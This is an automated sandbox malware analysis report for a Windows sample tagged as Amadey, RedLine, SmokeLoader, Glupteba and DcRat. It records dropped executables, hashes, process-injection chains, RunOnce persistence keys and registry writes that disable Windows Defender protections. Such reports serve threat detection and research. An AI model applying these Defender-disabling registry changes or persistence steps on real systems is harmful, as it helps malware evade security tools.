Malware Analysis Report

2025-01-23 09:10

Sample ID 231010-zcep8ahf6z
Target file.exe
SHA256 93672fe5c7a31c3ec7781d80ddd3104032dda555446444be8e1fc547bdaf5fd9
Tags: evasion persistence trojan amadey dcrat glupteba healer redline smokeloader 6012068394_99 lutyr magia up3 backdoor discovery dropper infostealer loader rat spyware stealer
Score: 10/10

Analysis Overview

Score: 10/10

SHA256 93672fe5c7a31c3ec7781d80ddd3104032dda555446444be8e1fc547bdaf5fd9

Threat Level: Known bad

The file file.exe was found to be: Known bad.

Malicious Activity Summary

Healer

Glupteba payload

Modifies Windows Defender Real-time Protection settings

Detects Healer an antivirus disabler dropper

SmokeLoader

RedLine

RedLine payload

DcRat

Glupteba

Amadey

Downloads MZ/PE file

Modifies Windows Firewall

Stops running service(s)

Loads dropped DLL

Reads user/profile data of web browsers

Windows security modification

Executes dropped EXE

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Checks installed software on the system

Suspicious use of SetThreadContext

Drops file in System32 directory

Launches sc.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Unsigned PE

Program crash

Enumerates physical storage devices

Uses Task Scheduler COM API

Creates scheduled task(s)

Suspicious use of SendNotifyMessage

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Checks SCSI registry key(s)

Enumerates system info in registry

Modifies data under HKEY_USERS

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Analysis: static1

Detonation Overview

Reported: 2023-10-10 20:34

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2023-10-10 20:34
Reported: 2023-10-10 20:36
Platform: win7-20230831-en
Max time kernel: 121s
Max time network: 124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2120 set thread context of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2696 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe
PID 2696 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe
PID 2696 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe
PID 2696 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe
PID 2696 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe
PID 2696 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe
PID 2696 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe
PID 2332 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe
PID 2332 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe
PID 2332 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe
PID 2332 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe
PID 2332 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe
PID 2332 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe
PID 2332 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe
PID 2720 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe
PID 2720 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe
PID 2720 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe
PID 2720 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe
PID 2720 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe
PID 2720 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe
PID 2720 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe
PID 2632 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe
PID 2632 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe
PID 2632 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe
PID 2632 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe
PID 2632 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe
PID 2632 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe
PID 2632 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe
PID 2632 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe
PID 2632 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe
PID 2632 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe
PID 2632 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe
PID 2632 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe
PID 2632 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe
PID 2632 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe
PID 2120 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2120 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2120 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2120 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2120 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2120 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2120 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2120 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2120 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2120 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2120 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2120 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2120 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2120 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2020 wrote to memory of 3068 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\SysWOW64\WerFault.exe
PID 2020 wrote to memory of 3068 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\SysWOW64\WerFault.exe
PID 2020 wrote to memory of 3068 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\SysWOW64\WerFault.exe
PID 2120 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\SysWOW64\WerFault.exe
PID 2020 wrote to memory of 3068 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\SysWOW64\WerFault.exe
PID 2120 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\SysWOW64\WerFault.exe
PID 2120 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\SysWOW64\WerFault.exe
PID 2020 wrote to memory of 3068 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\SysWOW64\WerFault.exe
PID 2020 wrote to memory of 3068 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\SysWOW64\WerFault.exe
PID 2020 wrote to memory of 3068 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\SysWOW64\WerFault.exe
PID 2120 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\SysWOW64\WerFault.exe
PID 2120 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\SysWOW64\WerFault.exe
PID 2120 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\SysWOW64\WerFault.exe
PID 2120 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2120 -s 284

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 268

Network

N/A

Files

\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe

MD5 a435fbc1e4e361f61a211d6cac3a4260
SHA1 3cb3d775bb552f7756705eeffa4f980bb65d79b3
SHA256 d58166b3ac6911cee9174430f5095c0c784aa7758fedbbaa6397c478bfe0779c
SHA512 4961076820bd6733dbf7df74a2e9d4983d6a8b34a6e251cc0cbc3d0f8a67b79d8fa64c0ea206ac5b81ab3e6f270a5cc84d059bb27ce730f691cf2ba901ae5b76

\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe

MD5 2b96a89e9ca635edafdb9682afa0d7a2
SHA1 669c1d1ba10291b7bff1378ae803acaf9e0d12d2
SHA256 127468c28226ccddc49412cff9429be898e88226b9f0431a1fa3993ae05ab9b2
SHA512 e990b19724f209a531d9c83795726b1f37dfb6c64eee2dfb080754b9c9190395542c7653cf867a1b55c2e9d8632f3258bd207fd2ff8687317dfe226a13bde36f

\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe

MD5 aae355668362de272191fdfd215753b2
SHA1 4de07034358734227c371008fd7ffa3062c4041e
SHA256 6396fef1ecfd47dd6479ae35389809b6d9a94c3aedf32b2b863cf25b999d3d1f
SHA512 5b5763933e76b34f61ab351d0f12c0428b80ed9f7b289bc54548e0581dc5e1b3dcf9540d3fbbe94fd78bf3ef0b3b3b415dab15a1edeed24aca870dc659496066

\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe

MD5 6241b03d68a610324ecda52f0f84e287
SHA1 da80280b6e3925e455925efd6c6e59a6118269c4
SHA256 ec74de9416b8ef2c3bdb1a9835e54548b3185524210d1aeffa91c98f74f751e2
SHA512 a60fe447cb0bed8e6cbd7c344b19a4602553209cbda7a40993f0fdf01e096bda4b79de0b528ecebf2efa0007f81d7bd6c7ef84252b2a160c93d642a78f0095f9

\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe

MD5 d9ca8ec6c70d1ba58410524e132d3aca
SHA1 5df75acc5c9b8864564406da1f9250ac8af74b66
SHA256 0ecae250b8109d5d073f13bf949b48081a7967fcf82cb04f4390160f0f753f6a
SHA512 c2666c327fe2f0c62a77d53be6ec16e4303225a53ce896a389f3e45b351fbdaa0c359922eb6133906bdfc0843084029dc0dd2a3ca78d043a41baa3f130bc2c2b

Analysis: behavioral2

Detonation Overview

Submitted: 2023-10-10 20:34
Reported: 2023-10-10 20:36
Platform: win10v2004-20230915-en
Max time kernel: 78s
Max time network: 155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\4A3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\4A3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\4A3.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\4A3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\4A3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\4A3.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\3D0A.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5fd4vF9.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\8F9.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3TQ78QB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4iG636EF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5fd4vF9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FB38.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZI4xM2Zd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FCB0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\pG3rS0fl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FDEA.bat N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Hf8Mh2Uh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Lq5hq4TW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1WK02es6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\185.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4A3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8F9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2NB190Af.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3D0A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5E3F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\60C1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6381.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\4A3.exe N/A
